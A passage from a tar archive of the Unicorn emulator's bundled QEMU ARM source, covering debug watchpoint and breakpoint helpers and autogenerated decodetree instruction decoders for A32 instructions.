lbn = extract64(cr, 16, 4); if (wt && !linked_bp_matches(cpu, lbn)) { return false; } return true; } static bool check_watchpoints(ARMCPU *cpu) { CPUARMState *env = &cpu->env; int n; /* * If watchpoints are disabled globally or we can't take debug * exceptions here then watchpoint firings are ignored. */ if (extract32(env->cp15.mdscr_el1, 15, 1) == 0 || !arm_generate_debug_exceptions(env)) { return false; } for (n = 0; n < ARRAY_SIZE(env->cpu_watchpoint); n++) { if (bp_wp_matches(cpu, n, true)) { return true; } } return false; } static bool check_breakpoints(ARMCPU *cpu) { CPUARMState *env = &cpu->env; int n; /* * If breakpoints are disabled globally or we can't take debug * exceptions here then breakpoint firings are ignored. */ if (extract32(env->cp15.mdscr_el1, 15, 1) == 0 || !arm_generate_debug_exceptions(env)) { return false; } for (n = 0; n < ARRAY_SIZE(env->cpu_breakpoint); n++) { if (bp_wp_matches(cpu, n, false)) { return true; } } return false; } void HELPER(check_breakpoints)(CPUARMState *env) { ARMCPU *cpu = env_archcpu(env); if (check_breakpoints(cpu)) { HELPER(exception_internal(env, EXCP_DEBUG)); } } bool arm_debug_check_watchpoint(CPUState *cs, CPUWatchpoint *wp) { /* * Called by core code when a CPU watchpoint fires; need to check if this * is also an architectural watchpoint match. */ ARMCPU *cpu = ARM_CPU(cs); return check_watchpoints(cpu); } void arm_debug_excp_handler(CPUState *cs) { /* * Called by core code when a watchpoint or breakpoint fires; * need to check which one and raise the appropriate exception. */ ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; CPUWatchpoint *wp_hit = cs->watchpoint_hit; if (wp_hit) { if (wp_hit->flags & BP_CPU) { bool wnr = (wp_hit->flags & BP_WATCHPOINT_HIT_WRITE) != 0; bool same_el = arm_debug_target_el(env) == arm_current_el(env); cs->watchpoint_hit = NULL; env->exception.fsr = arm_debug_exception_fsr(env); env->exception.vaddress = wp_hit->hitaddr; raise_exception(env, EXCP_DATA_ABORT, syn_watchpoint(same_el, 0, wnr), arm_debug_target_el(env)); } } else { uint64_t pc = is_a64(env) ? env->pc : env->regs[15]; bool same_el = (arm_debug_target_el(env) == arm_current_el(env)); /* * (1) GDB breakpoints should be handled first. * (2) Do not raise a CPU exception if no CPU breakpoint has fired, * since singlestep is also done by generating a debug internal * exception. */ if (cpu_breakpoint_test(cs, pc, BP_GDB) || !cpu_breakpoint_test(cs, pc, BP_CPU)) { return; } env->exception.fsr = arm_debug_exception_fsr(env); /* * FAR is UNKNOWN: clear vaddress to avoid potentially exposing * values to the guest that it shouldn't be able to see at its * exception/security level. */ env->exception.vaddress = 0; raise_exception(env, EXCP_PREFETCH_ABORT, syn_breakpoint(same_el), arm_debug_target_el(env)); } } vaddr arm_adjust_watchpoint_address(CPUState *cs, vaddr addr, int len) { ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; /* * In BE32 system mode, target memory is stored byteswapped (on a * little-endian host system), and by the time we reach here (via an * opcode helper) the addresses of subword accesses have been adjusted * to account for that, which means that watchpoints will not match. * Undo the adjustment here. */ if (arm_sctlr_b(env)) { if (len == 1) { addr ^= 3; } else if (len == 2) { addr ^= 2; } } return addr; } �������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/decode-a32-uncond.inc.c�����������������������������������������������0000664�0000000�0000000�00000026601�14675241067�0022233�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* This file is autogenerated by scripts/decodetree.py. */ typedef struct { int A; int F; int I; int M; int imod; int mode; } arg_cps; typedef struct { int pu; int rn; int w; } arg_rfe; typedef struct { int E; } arg_setend; typedef struct { int mode; int pu; int w; } arg_srs; #ifdef CONFIG_PRAGMA_DIAGNOSTIC_AVAILABLE # pragma GCC diagnostic push # pragma GCC diagnostic ignored "-Wredundant-decls" # ifdef __clang__ # pragma GCC diagnostic ignored "-Wtypedef-redefinition" # endif #endif typedef arg_i arg_BLX_i; static bool trans_BLX_i(DisasContext *ctx, arg_BLX_i *a); typedef arg_rfe arg_RFE; static bool trans_RFE(DisasContext *ctx, arg_RFE *a); typedef arg_srs arg_SRS; static bool trans_SRS(DisasContext *ctx, arg_SRS *a); typedef arg_cps arg_CPS; static bool trans_CPS(DisasContext *ctx, arg_CPS *a); typedef arg_empty arg_CLREX; static bool trans_CLREX(DisasContext *ctx, arg_CLREX *a); typedef arg_empty arg_DSB; static bool trans_DSB(DisasContext *ctx, arg_DSB *a); typedef arg_empty arg_DMB; static bool trans_DMB(DisasContext *ctx, arg_DMB *a); typedef arg_empty arg_ISB; static bool trans_ISB(DisasContext *ctx, arg_ISB *a); typedef arg_empty arg_SB; static bool trans_SB(DisasContext *ctx, arg_SB *a); typedef arg_setend arg_SETEND; static bool trans_SETEND(DisasContext *ctx, arg_SETEND *a); typedef arg_empty arg_PLD; static bool trans_PLD(DisasContext *ctx, arg_PLD *a); typedef arg_empty arg_PLDW; static bool trans_PLDW(DisasContext *ctx, arg_PLDW *a); typedef arg_empty arg_PLI; static bool trans_PLI(DisasContext *ctx, arg_PLI *a); #ifdef CONFIG_PRAGMA_DIAGNOSTIC_AVAILABLE # pragma GCC diagnostic pop #endif static void disas_a32_uncond_extract_disas_a32_uncond_Fmt_0(DisasContext *ctx, arg_i *a, uint32_t insn) { a->imm = times_2(ctx, deposit32(extract32(insn, 24, 1), 1, 31, sextract32(insn, 0, 24))); } static void disas_a32_uncond_extract_disas_a32_uncond_Fmt_1(DisasContext *ctx, arg_rfe *a, uint32_t insn) { a->pu = extract32(insn, 23, 2); a->w = extract32(insn, 21, 1); a->rn = extract32(insn, 16, 4); } static void disas_a32_uncond_extract_disas_a32_uncond_Fmt_2(DisasContext *ctx, arg_srs *a, uint32_t insn) { a->pu = extract32(insn, 23, 2); a->w = extract32(insn, 21, 1); a->mode = extract32(insn, 0, 5); } static void disas_a32_uncond_extract_disas_a32_uncond_Fmt_3(DisasContext *ctx, arg_cps *a, uint32_t insn) { a->imod = extract32(insn, 18, 2); a->M = extract32(insn, 17, 1); a->A = extract32(insn, 8, 1); a->I = extract32(insn, 7, 1); a->F = extract32(insn, 6, 1); a->mode = extract32(insn, 0, 5); } static void disas_a32_uncond_extract_disas_a32_uncond_Fmt_4(DisasContext *ctx, arg_empty *a, uint32_t insn) { } static void disas_a32_uncond_extract_disas_a32_uncond_Fmt_5(DisasContext *ctx, arg_setend *a, uint32_t insn) { a->E = extract32(insn, 9, 1); } static bool disas_a32_uncond(DisasContext *ctx, uint32_t insn) { union { arg_cps f_cps; arg_empty f_empty; arg_i f_i; arg_rfe f_rfe; arg_setend f_setend; arg_srs f_srs; } u; switch ((insn >> 25) & 0x7f) { case 0x78: /* 1111000. ........ ........ ........ */ switch (insn & 0x01f1fc20) { case 0x01000000: /* 11110001 0000...0 000000.. ..0..... */ disas_a32_uncond_extract_disas_a32_uncond_Fmt_3(ctx, &u.f_cps, insn); switch ((insn >> 9) & 0x1) { case 0x0: /* 11110001 0000...0 0000000. ..0..... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:43 */ if (trans_CPS(ctx, &u.f_cps)) return true; return false; } return false; case 0x01010000: /* 11110001 0000...1 000000.. ..0..... */ disas_a32_uncond_extract_disas_a32_uncond_Fmt_5(ctx, &u.f_setend, insn); switch (insn & 0x000e01df) { case 0x00000000: /* 11110001 00000001 000000.0 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:56 */ if (trans_SETEND(ctx, &u.f_setend)) return true; return false; } return false; } return false; case 0x7a: /* 1111010. ........ ........ ........ */ disas_a32_uncond_extract_disas_a32_uncond_Fmt_4(ctx, &u.f_empty, insn); switch (insn & 0x01700000) { case 0x00100000: /* 11110100 .001.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:73 */ if (trans_PLDW(ctx, &u.f_empty)) return true; return false; case 0x00500000: /* 11110100 .101.... ........ ........ */ switch ((insn >> 12) & 0xf) { case 0xf: /* 11110100 .101.... 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:62 */ if (trans_PLI(ctx, &u.f_empty)) return true; return false; } return false; case 0x01100000: /* 11110101 .001.... ........ ........ */ switch ((insn >> 12) & 0xf) { case 0xf: /* 11110101 .001.... 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:61 */ if (trans_PLDW(ctx, &u.f_empty)) return true; return false; } return false; case 0x01500000: /* 11110101 .101.... ........ ........ */ switch ((insn >> 12) & 0xf) { case 0xf: /* 11110101 .101.... 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:60 */ if (trans_PLD(ctx, &u.f_empty)) return true; return false; } return false; case 0x01700000: /* 11110101 .111.... ........ ........ */ switch (insn & 0x008ffff0) { case 0x000ff010: /* 11110101 01111111 11110000 0001.... */ switch (insn & 0x0000000f) { case 0x0000000f: /* 11110101 01111111 11110000 00011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:49 */ if (trans_CLREX(ctx, &u.f_empty)) return true; return false; } return false; case 0x000ff040: /* 11110101 01111111 11110000 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:50 */ if (trans_DSB(ctx, &u.f_empty)) return true; return false; case 0x000ff050: /* 11110101 01111111 11110000 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:51 */ if (trans_DMB(ctx, &u.f_empty)) return true; return false; case 0x000ff060: /* 11110101 01111111 11110000 0110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:52 */ if (trans_ISB(ctx, &u.f_empty)) return true; return false; case 0x000ff070: /* 11110101 01111111 11110000 0111.... */ switch (insn & 0x0000000f) { case 0x00000000: /* 11110101 01111111 11110000 01110000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:53 */ if (trans_SB(ctx, &u.f_empty)) return true; return false; } return false; } return false; } return false; case 0x7b: /* 1111011. ........ ........ ........ */ disas_a32_uncond_extract_disas_a32_uncond_Fmt_4(ctx, &u.f_empty, insn); switch (insn & 0x01700010) { case 0x00100000: /* 11110110 .001.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:74 */ if (trans_PLDW(ctx, &u.f_empty)) return true; return false; case 0x00500000: /* 11110110 .101.... ........ ...0.... */ switch ((insn >> 12) & 0xf) { case 0xf: /* 11110110 .101.... 1111.... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:66 */ if (trans_PLI(ctx, &u.f_empty)) return true; return false; } return false; case 0x01100000: /* 11110111 .001.... ........ ...0.... */ switch ((insn >> 12) & 0xf) { case 0xf: /* 11110111 .001.... 1111.... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:65 */ if (trans_PLDW(ctx, &u.f_empty)) return true; return false; } return false; case 0x01500000: /* 11110111 .101.... ........ ...0.... */ switch ((insn >> 12) & 0xf) { case 0xf: /* 11110111 .101.... 1111.... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:64 */ if (trans_PLD(ctx, &u.f_empty)) return true; return false; } return false; } return false; case 0x7c: /* 1111100. ........ ........ ........ */ switch (insn & 0x0050ffe0) { case 0x00100a00: /* 1111100. .0.1.... 00001010 000..... */ disas_a32_uncond_extract_disas_a32_uncond_Fmt_1(ctx, &u.f_rfe, insn); switch (insn & 0x0000001f) { case 0x00000000: /* 1111100. .0.1.... 00001010 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:41 */ if (trans_RFE(ctx, &u.f_rfe)) return true; return false; } return false; case 0x00400500: /* 1111100. .1.0.... 00000101 000..... */ disas_a32_uncond_extract_disas_a32_uncond_Fmt_2(ctx, &u.f_srs, insn); switch ((insn >> 16) & 0xf) { case 0xd: /* 1111100. .1.01101 00000101 000..... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:42 */ if (trans_SRS(ctx, &u.f_srs)) return true; return false; } return false; } return false; case 0x7d: /* 1111101. ........ ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:33 */ disas_a32_uncond_extract_disas_a32_uncond_Fmt_0(ctx, &u.f_i, insn); if (trans_BLX_i(ctx, &u.f_i)) return true; return false; } return false; } �������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/decode-a32.inc.c������������������������������������������������������0000664�0000000�0000000�00000472411�14675241067�0020753�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* This file is autogenerated by scripts/decodetree.py. */ typedef struct { int lsb; int msb; int rd; int rn; } arg_bfi; typedef struct { int lsb; int rd; int rn; int widthm1; } arg_bfx; typedef struct { int rn; int rt; int rt2; } arg_disas_a3226; typedef struct { #ifdef _MSC_VER int dummy; #endif } arg_empty; typedef struct { int imm; } arg_i; typedef struct { int imm; int rn; int rt; int rt2; } arg_ldrex; typedef struct { int b; int i; int list; int rn; int u; int w; } arg_ldst_block; typedef struct { int imm; int p; int rn; int rt; int u; int w; } arg_ldst_ri; typedef struct { int p; int rm; int rn; int rt; int shimm; int shtype; int u; int w; } arg_ldst_rr; typedef struct { int r; int rd; int sysm; } arg_mrs_bank; typedef struct { int r; int rd; } arg_mrs_reg; typedef struct { int r; int rn; int sysm; } arg_msr_bank; typedef struct { int imm; int mask; int r; int rot; } arg_msr_i; typedef struct { int mask; int r; int rn; } arg_msr_reg; typedef struct { int imm; int rd; int rm; int rn; int tb; } arg_pkh; typedef struct { int rm; } arg_r; typedef struct { int imm; int rd; } arg_ri; typedef struct { int rd; int rm; } arg_rr; typedef struct { int rd; int rm; int rn; } arg_rrr; typedef struct { int rd; int rm; int rn; int rot; } arg_rrr_rot; typedef struct { int ra; int rd; int rm; int rn; } arg_rrrr; typedef struct { int imm; int rd; int rn; int rot; int s; } arg_s_rri_rot; typedef struct { int rd; int rm; int rn; int s; int shim; int shty; } arg_s_rrr_shi; typedef struct { int rd; int rm; int rn; int rs; int s; int shty; } arg_s_rrr_shr; typedef struct { int ra; int rd; int rm; int rn; int s; } arg_s_rrrr; typedef struct { int imm; int rd; int rn; int satimm; int sh; } arg_sat; typedef struct { int imm; int rd; int rn; int rt; int rt2; } arg_strex; typedef arg_s_rrr_shi arg_AND_rrri; static bool trans_AND_rrri(DisasContext *ctx, arg_AND_rrri *a); typedef arg_s_rrr_shi arg_EOR_rrri; static bool trans_EOR_rrri(DisasContext *ctx, arg_EOR_rrri *a); typedef arg_s_rrr_shi arg_SUB_rrri; static bool trans_SUB_rrri(DisasContext *ctx, arg_SUB_rrri *a); typedef arg_s_rrr_shi arg_RSB_rrri; static bool trans_RSB_rrri(DisasContext *ctx, arg_RSB_rrri *a); typedef arg_s_rrr_shi arg_ADD_rrri; static bool trans_ADD_rrri(DisasContext *ctx, arg_ADD_rrri *a); typedef arg_s_rrr_shi arg_ADC_rrri; static bool trans_ADC_rrri(DisasContext *ctx, arg_ADC_rrri *a); typedef arg_s_rrr_shi arg_SBC_rrri; static bool trans_SBC_rrri(DisasContext *ctx, arg_SBC_rrri *a); typedef arg_s_rrr_shi arg_RSC_rrri; static bool trans_RSC_rrri(DisasContext *ctx, arg_RSC_rrri *a); typedef arg_s_rrr_shi arg_TST_xrri; static bool trans_TST_xrri(DisasContext *ctx, arg_TST_xrri *a); typedef arg_s_rrr_shi arg_TEQ_xrri; static bool trans_TEQ_xrri(DisasContext *ctx, arg_TEQ_xrri *a); typedef arg_s_rrr_shi arg_CMP_xrri; static bool trans_CMP_xrri(DisasContext *ctx, arg_CMP_xrri *a); typedef arg_s_rrr_shi arg_CMN_xrri; static bool trans_CMN_xrri(DisasContext *ctx, arg_CMN_xrri *a); typedef arg_s_rrr_shi arg_ORR_rrri; static bool trans_ORR_rrri(DisasContext *ctx, arg_ORR_rrri *a); typedef arg_s_rrr_shi arg_MOV_rxri; static bool trans_MOV_rxri(DisasContext *ctx, arg_MOV_rxri *a); typedef arg_s_rrr_shi arg_BIC_rrri; static bool trans_BIC_rrri(DisasContext *ctx, arg_BIC_rrri *a); typedef arg_s_rrr_shi arg_MVN_rxri; static bool trans_MVN_rxri(DisasContext *ctx, arg_MVN_rxri *a); typedef arg_ri arg_MOVW; static bool trans_MOVW(DisasContext *ctx, arg_MOVW *a); typedef arg_ri arg_MOVT; static bool trans_MOVT(DisasContext *ctx, arg_MOVT *a); typedef arg_s_rrr_shr arg_AND_rrrr; static bool trans_AND_rrrr(DisasContext *ctx, arg_AND_rrrr *a); typedef arg_s_rrr_shr arg_EOR_rrrr; static bool trans_EOR_rrrr(DisasContext *ctx, arg_EOR_rrrr *a); typedef arg_s_rrr_shr arg_SUB_rrrr; static bool trans_SUB_rrrr(DisasContext *ctx, arg_SUB_rrrr *a); typedef arg_s_rrr_shr arg_RSB_rrrr; static bool trans_RSB_rrrr(DisasContext *ctx, arg_RSB_rrrr *a); typedef arg_s_rrr_shr arg_ADD_rrrr; static bool trans_ADD_rrrr(DisasContext *ctx, arg_ADD_rrrr *a); typedef arg_s_rrr_shr arg_ADC_rrrr; static bool trans_ADC_rrrr(DisasContext *ctx, arg_ADC_rrrr *a); typedef arg_s_rrr_shr arg_SBC_rrrr; static bool trans_SBC_rrrr(DisasContext *ctx, arg_SBC_rrrr *a); typedef arg_s_rrr_shr arg_RSC_rrrr; static bool trans_RSC_rrrr(DisasContext *ctx, arg_RSC_rrrr *a); typedef arg_s_rrr_shr arg_TST_xrrr; static bool trans_TST_xrrr(DisasContext *ctx, arg_TST_xrrr *a); typedef arg_s_rrr_shr arg_TEQ_xrrr; static bool trans_TEQ_xrrr(DisasContext *ctx, arg_TEQ_xrrr *a); typedef arg_s_rrr_shr arg_CMP_xrrr; static bool trans_CMP_xrrr(DisasContext *ctx, arg_CMP_xrrr *a); typedef arg_s_rrr_shr arg_CMN_xrrr; static bool trans_CMN_xrrr(DisasContext *ctx, arg_CMN_xrrr *a); typedef arg_s_rrr_shr arg_ORR_rrrr; static bool trans_ORR_rrrr(DisasContext *ctx, arg_ORR_rrrr *a); typedef arg_s_rrr_shr arg_MOV_rxrr; static bool trans_MOV_rxrr(DisasContext *ctx, arg_MOV_rxrr *a); typedef arg_s_rrr_shr arg_BIC_rrrr; static bool trans_BIC_rrrr(DisasContext *ctx, arg_BIC_rrrr *a); typedef arg_s_rrr_shr arg_MVN_rxrr; static bool trans_MVN_rxrr(DisasContext *ctx, arg_MVN_rxrr *a); typedef arg_s_rri_rot arg_AND_rri; static bool trans_AND_rri(DisasContext *ctx, arg_AND_rri *a); typedef arg_s_rri_rot arg_EOR_rri; static bool trans_EOR_rri(DisasContext *ctx, arg_EOR_rri *a); typedef arg_s_rri_rot arg_SUB_rri; static bool trans_SUB_rri(DisasContext *ctx, arg_SUB_rri *a); typedef arg_s_rri_rot arg_RSB_rri; static bool trans_RSB_rri(DisasContext *ctx, arg_RSB_rri *a); typedef arg_s_rri_rot arg_ADD_rri; static bool trans_ADD_rri(DisasContext *ctx, arg_ADD_rri *a); typedef arg_s_rri_rot arg_ADC_rri; static bool trans_ADC_rri(DisasContext *ctx, arg_ADC_rri *a); typedef arg_s_rri_rot arg_SBC_rri; static bool trans_SBC_rri(DisasContext *ctx, arg_SBC_rri *a); typedef arg_s_rri_rot arg_RSC_rri; static bool trans_RSC_rri(DisasContext *ctx, arg_RSC_rri *a); typedef arg_s_rri_rot arg_TST_xri; static bool trans_TST_xri(DisasContext *ctx, arg_TST_xri *a); typedef arg_s_rri_rot arg_TEQ_xri; static bool trans_TEQ_xri(DisasContext *ctx, arg_TEQ_xri *a); typedef arg_s_rri_rot arg_CMP_xri; static bool trans_CMP_xri(DisasContext *ctx, arg_CMP_xri *a); typedef arg_s_rri_rot arg_CMN_xri; static bool trans_CMN_xri(DisasContext *ctx, arg_CMN_xri *a); typedef arg_s_rri_rot arg_ORR_rri; static bool trans_ORR_rri(DisasContext *ctx, arg_ORR_rri *a); typedef arg_s_rri_rot arg_MOV_rxi; static bool trans_MOV_rxi(DisasContext *ctx, arg_MOV_rxi *a); typedef arg_s_rri_rot arg_BIC_rri; static bool trans_BIC_rri(DisasContext *ctx, arg_BIC_rri *a); typedef arg_s_rri_rot arg_MVN_rxi; static bool trans_MVN_rxi(DisasContext *ctx, arg_MVN_rxi *a); typedef arg_s_rrrr arg_MUL; static bool trans_MUL(DisasContext *ctx, arg_MUL *a); typedef arg_s_rrrr arg_MLA; static bool trans_MLA(DisasContext *ctx, arg_MLA *a); typedef arg_rrrr arg_UMAAL; static bool trans_UMAAL(DisasContext *ctx, arg_UMAAL *a); typedef arg_rrrr arg_MLS; static bool trans_MLS(DisasContext *ctx, arg_MLS *a); typedef arg_s_rrrr arg_UMULL; static bool trans_UMULL(DisasContext *ctx, arg_UMULL *a); typedef arg_s_rrrr arg_UMLAL; static bool trans_UMLAL(DisasContext *ctx, arg_UMLAL *a); typedef arg_s_rrrr arg_SMULL; static bool trans_SMULL(DisasContext *ctx, arg_SMULL *a); typedef arg_s_rrrr arg_SMLAL; static bool trans_SMLAL(DisasContext *ctx, arg_SMLAL *a); typedef arg_rrr arg_QADD; static bool trans_QADD(DisasContext *ctx, arg_QADD *a); typedef arg_rrr arg_QSUB; static bool trans_QSUB(DisasContext *ctx, arg_QSUB *a); typedef arg_rrr arg_QDADD; static bool trans_QDADD(DisasContext *ctx, arg_QDADD *a); typedef arg_rrr arg_QDSUB; static bool trans_QDSUB(DisasContext *ctx, arg_QDSUB *a); typedef arg_rrrr arg_SMLABB; static bool trans_SMLABB(DisasContext *ctx, arg_SMLABB *a); typedef arg_rrrr arg_SMLABT; static bool trans_SMLABT(DisasContext *ctx, arg_SMLABT *a); typedef arg_rrrr arg_SMLATB; static bool trans_SMLATB(DisasContext *ctx, arg_SMLATB *a); typedef arg_rrrr arg_SMLATT; static bool trans_SMLATT(DisasContext *ctx, arg_SMLATT *a); typedef arg_rrrr arg_SMLAWB; static bool trans_SMLAWB(DisasContext *ctx, arg_SMLAWB *a); typedef arg_rrrr arg_SMULWB; static bool trans_SMULWB(DisasContext *ctx, arg_SMULWB *a); typedef arg_rrrr arg_SMLAWT; static bool trans_SMLAWT(DisasContext *ctx, arg_SMLAWT *a); typedef arg_rrrr arg_SMULWT; static bool trans_SMULWT(DisasContext *ctx, arg_SMULWT *a); typedef arg_rrrr arg_SMLALBB; static bool trans_SMLALBB(DisasContext *ctx, arg_SMLALBB *a); typedef arg_rrrr arg_SMLALBT; static bool trans_SMLALBT(DisasContext *ctx, arg_SMLALBT *a); typedef arg_rrrr arg_SMLALTB; static bool trans_SMLALTB(DisasContext *ctx, arg_SMLALTB *a); typedef arg_rrrr arg_SMLALTT; static bool trans_SMLALTT(DisasContext *ctx, arg_SMLALTT *a); typedef arg_rrrr arg_SMULBB; static bool trans_SMULBB(DisasContext *ctx, arg_SMULBB *a); typedef arg_rrrr arg_SMULBT; static bool trans_SMULBT(DisasContext *ctx, arg_SMULBT *a); typedef arg_rrrr arg_SMULTB; static bool trans_SMULTB(DisasContext *ctx, arg_SMULTB *a); typedef arg_rrrr arg_SMULTT; static bool trans_SMULTT(DisasContext *ctx, arg_SMULTT *a); typedef arg_empty arg_YIELD; static bool trans_YIELD(DisasContext *ctx, arg_YIELD *a); typedef arg_empty arg_WFE; static bool trans_WFE(DisasContext *ctx, arg_WFE *a); typedef arg_empty arg_WFI; static bool trans_WFI(DisasContext *ctx, arg_WFI *a); typedef arg_empty arg_NOP; static bool trans_NOP(DisasContext *ctx, arg_NOP *a); typedef arg_msr_i arg_MSR_imm; static bool trans_MSR_imm(DisasContext *ctx, arg_MSR_imm *a); typedef arg_rrr arg_CRC32B; static bool trans_CRC32B(DisasContext *ctx, arg_CRC32B *a); typedef arg_rrr arg_CRC32H; static bool trans_CRC32H(DisasContext *ctx, arg_CRC32H *a); typedef arg_rrr arg_CRC32W; static bool trans_CRC32W(DisasContext *ctx, arg_CRC32W *a); typedef arg_rrr arg_CRC32CB; static bool trans_CRC32CB(DisasContext *ctx, arg_CRC32CB *a); typedef arg_rrr arg_CRC32CH; static bool trans_CRC32CH(DisasContext *ctx, arg_CRC32CH *a); typedef arg_rrr arg_CRC32CW; static bool trans_CRC32CW(DisasContext *ctx, arg_CRC32CW *a); typedef arg_mrs_bank arg_MRS_bank; static bool trans_MRS_bank(DisasContext *ctx, arg_MRS_bank *a); typedef arg_msr_bank arg_MSR_bank; static bool trans_MSR_bank(DisasContext *ctx, arg_MSR_bank *a); typedef arg_mrs_reg arg_MRS_reg; static bool trans_MRS_reg(DisasContext *ctx, arg_MRS_reg *a); typedef arg_msr_reg arg_MSR_reg; static bool trans_MSR_reg(DisasContext *ctx, arg_MSR_reg *a); typedef arg_r arg_BX; static bool trans_BX(DisasContext *ctx, arg_BX *a); typedef arg_r arg_BXJ; static bool trans_BXJ(DisasContext *ctx, arg_BXJ *a); typedef arg_r arg_BLX_r; static bool trans_BLX_r(DisasContext *ctx, arg_BLX_r *a); typedef arg_rr arg_CLZ; static bool trans_CLZ(DisasContext *ctx, arg_CLZ *a); typedef arg_empty arg_ERET; static bool trans_ERET(DisasContext *ctx, arg_ERET *a); typedef arg_i arg_HLT; static bool trans_HLT(DisasContext *ctx, arg_HLT *a); typedef arg_i arg_BKPT; static bool trans_BKPT(DisasContext *ctx, arg_BKPT *a); typedef arg_i arg_HVC; static bool trans_HVC(DisasContext *ctx, arg_HVC *a); typedef arg_i arg_SMC; static bool trans_SMC(DisasContext *ctx, arg_SMC *a); typedef arg_ldst_rr arg_STRH_rr; static bool trans_STRH_rr(DisasContext *ctx, arg_STRH_rr *a); typedef arg_ldst_rr arg_LDRD_rr; static bool trans_LDRD_rr(DisasContext *ctx, arg_LDRD_rr *a); typedef arg_ldst_rr arg_STRD_rr; static bool trans_STRD_rr(DisasContext *ctx, arg_STRD_rr *a); typedef arg_ldst_rr arg_LDRH_rr; static bool trans_LDRH_rr(DisasContext *ctx, arg_LDRH_rr *a); typedef arg_ldst_rr arg_LDRSB_rr; static bool trans_LDRSB_rr(DisasContext *ctx, arg_LDRSB_rr *a); typedef arg_ldst_rr arg_LDRSH_rr; static bool trans_LDRSH_rr(DisasContext *ctx, arg_LDRSH_rr *a); typedef arg_ldst_rr arg_STRHT_rr; static bool trans_STRHT_rr(DisasContext *ctx, arg_STRHT_rr *a); typedef arg_ldst_rr arg_LDRHT_rr; static bool trans_LDRHT_rr(DisasContext *ctx, arg_LDRHT_rr *a); typedef arg_ldst_rr arg_LDRSBT_rr; static bool trans_LDRSBT_rr(DisasContext *ctx, arg_LDRSBT_rr *a); typedef arg_ldst_rr arg_LDRSHT_rr; static bool trans_LDRSHT_rr(DisasContext *ctx, arg_LDRSHT_rr *a); typedef arg_ldst_rr arg_STR_rr; static bool trans_STR_rr(DisasContext *ctx, arg_STR_rr *a); typedef arg_ldst_rr arg_STRB_rr; static bool trans_STRB_rr(DisasContext *ctx, arg_STRB_rr *a); typedef arg_ldst_rr arg_LDR_rr; static bool trans_LDR_rr(DisasContext *ctx, arg_LDR_rr *a); typedef arg_ldst_rr arg_LDRB_rr; static bool trans_LDRB_rr(DisasContext *ctx, arg_LDRB_rr *a); typedef arg_ldst_rr arg_STRT_rr; static bool trans_STRT_rr(DisasContext *ctx, arg_STRT_rr *a); typedef arg_ldst_rr arg_STRBT_rr; static bool trans_STRBT_rr(DisasContext *ctx, arg_STRBT_rr *a); typedef arg_ldst_rr arg_LDRT_rr; static bool trans_LDRT_rr(DisasContext *ctx, arg_LDRT_rr *a); typedef arg_ldst_rr arg_LDRBT_rr; static bool trans_LDRBT_rr(DisasContext *ctx, arg_LDRBT_rr *a); typedef arg_ldst_ri arg_STRH_ri; static bool trans_STRH_ri(DisasContext *ctx, arg_STRH_ri *a); typedef arg_ldst_ri arg_LDRD_ri_a32; static bool trans_LDRD_ri_a32(DisasContext *ctx, arg_LDRD_ri_a32 *a); typedef arg_ldst_ri arg_STRD_ri_a32; static bool trans_STRD_ri_a32(DisasContext *ctx, arg_STRD_ri_a32 *a); typedef arg_ldst_ri arg_LDRH_ri; static bool trans_LDRH_ri(DisasContext *ctx, arg_LDRH_ri *a); typedef arg_ldst_ri arg_LDRSB_ri; static bool trans_LDRSB_ri(DisasContext *ctx, arg_LDRSB_ri *a); typedef arg_ldst_ri arg_LDRSH_ri; static bool trans_LDRSH_ri(DisasContext *ctx, arg_LDRSH_ri *a); typedef arg_ldst_ri arg_STRHT_ri; static bool trans_STRHT_ri(DisasContext *ctx, arg_STRHT_ri *a); typedef arg_ldst_ri arg_LDRHT_ri; static bool trans_LDRHT_ri(DisasContext *ctx, arg_LDRHT_ri *a); typedef arg_ldst_ri 